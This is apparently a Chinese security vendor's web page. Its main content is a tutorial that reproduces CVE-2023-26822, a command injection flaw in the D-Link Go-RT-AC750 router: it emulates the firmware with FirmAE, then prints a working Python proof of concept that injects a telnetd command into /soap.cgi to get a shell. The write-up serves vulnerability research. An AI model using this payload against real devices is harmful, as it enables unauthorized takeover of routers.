存儲(chǔ)域
數(shù)據(jù)庫(kù)加密 諾亞防勒索訪問(wèn)域
數(shù)據(jù)庫(kù)防水壩 數(shù)據(jù)庫(kù)防火墻 數(shù)據(jù)庫(kù)安全審計(jì) 動(dòng)態(tài)脫敏流動(dòng)域
靜態(tài)脫敏 數(shù)據(jù)水印 API審計(jì) API防控 醫(yī)療防統(tǒng)方運(yùn)維服務(wù)
數(shù)據(jù)庫(kù)運(yùn)維服務(wù) 中間件運(yùn)維服務(wù) 國(guó)產(chǎn)信創(chuàng)改造服務(wù) 駐場(chǎng)運(yùn)維服務(wù) 供數(shù)服務(wù)安全咨詢服務(wù)
數(shù)據(jù)出境安全治理服務(wù) 數(shù)據(jù)安全能力評(píng)估認(rèn)證服務(wù) 數(shù)據(jù)安全風(fēng)險(xiǎn)評(píng)估服務(wù) 數(shù)據(jù)安全治理咨詢服務(wù) 數(shù)據(jù)分類分級(jí)咨詢服務(wù) 個(gè)人信息風(fēng)險(xiǎn)評(píng)估服務(wù) 數(shù)據(jù)安全檢查服務(wù)美創(chuàng)AI災(zāi)備專家:引領(lǐng)災(zāi)備領(lǐng)域邁入“智能化”時(shí)代
2025-12-15
熱點(diǎn)觀察|美創(chuàng)科技丁斐:數(shù)據(jù)安全 × 價(jià)值共創(chuàng)?可信數(shù)據(jù)空間的 “雙向奔赴”
2025-12-03
美創(chuàng)科技高校供應(yīng)鏈數(shù)據(jù)安全方案斬獲 2025 年度 “金智獎(jiǎng)”
2025-12-03
每周安全速遞3?? | ShinyHunters 開(kāi)發(fā)新型勒索軟件ShinySp1d3r
2025-11-21
數(shù)安標(biāo)桿|美創(chuàng)榮登2025中國(guó)準(zhǔn)獨(dú)角獸企業(yè)100強(qiáng)?
2025-11-17
每周安全速遞3?? | 勒索軟件攻擊導(dǎo)致心理健康機(jī)構(gòu)超11萬(wàn)人數(shù)據(jù)泄露
2025-12-19
每周安全速遞3?? | 安卓勒索軟件DroidLock針對(duì)西班牙語(yǔ)言用戶進(jìn)行攻擊
2025-12-15
每周安全速遞3?? | 美國(guó)電信與汽車(chē)服務(wù)巨頭遭Cl0p勒索攻擊
2025-12-05
每周安全速遞3?? | ShinyHunters 開(kāi)發(fā)新型勒索軟件ShinySp1d3r
2025-11-21
AI大模型+N8N工作流的自動(dòng)化安全測(cè)試流程初探
2025-11-17
D-Link Go-RT-AC750在固件版本為revA_v101b03中存在命令注入漏洞,漏洞編號(hào):CVE-2023-26822。未經(jīng)授權(quán)的攻擊者可以請(qǐng)求 /soap.cgi 路由通過(guò)攜帶的參數(shù)進(jìn)行命令拼接,從而控制路由器。
1.FirmAE 工具安裝;首先拉取FirmAE 工具倉(cāng)庫(kù)
git clone --recursive https://github.com/pr0v3rbs/FirmAE
運(yùn)行下載腳本;
cd FirmAE/./download.sh
運(yùn)行./install.sh進(jìn)行安裝
2.下載固件
本文模擬的是設(shè)備型號(hào)為Go-RT-AC750,固件版本:revA_v101b03
下載地址:
https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-
下載后得到GORTAC750_A1_FW_v101b03.bin固件文件
3.FirmAE工具初始化
在FirmAE工具目錄下執(zhí)行./init.sh進(jìn)行初始化
4.安裝binwalk
這里使用FirmAE工具目錄下的binwalk安裝程序進(jìn)行安裝
cd binwalk-2.3.3/
python3 setup.py install
5.模擬運(yùn)行固件
執(zhí)行如下命令對(duì)固件進(jìn)行解壓
binwalk -Me /root/GORTAC750_A1_FW_v101b03.bin --run-as=root
執(zhí)行如下命令來(lái)模擬運(yùn)行固件
sudo ./run.sh -r GORTAC750 /root/GORTAC750_A1_FW_v101b03.bin
使用瀏覽器訪問(wèn)http://192.168.0.1,出現(xiàn)如下界面則表明成功模擬了一臺(tái)D-Link Go-RT-AC750路由器
POC內(nèi)容如下:
from socket import *from os import *from time import *request = b"POST /soap.cgi?service=&&telnetd -p 4123& HTTP/1.1\r\n"request += b"Host: localhost:49152\r\n"request += b"Content-Type: text/xml\r\n"request += b"Content-Length: 88\r\n"request += b"SOAPAction: a#b\r\n\r\n"s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request)sleep(10)system('telnet 192.168.0.1 4123')
執(zhí)行POC,成功獲取shell.
python3 poc.py
官方訂閱號(hào)
官方服務(wù)號(hào)
第59號(hào)
浙公網(wǎng)安備 33010502006954號(hào) 
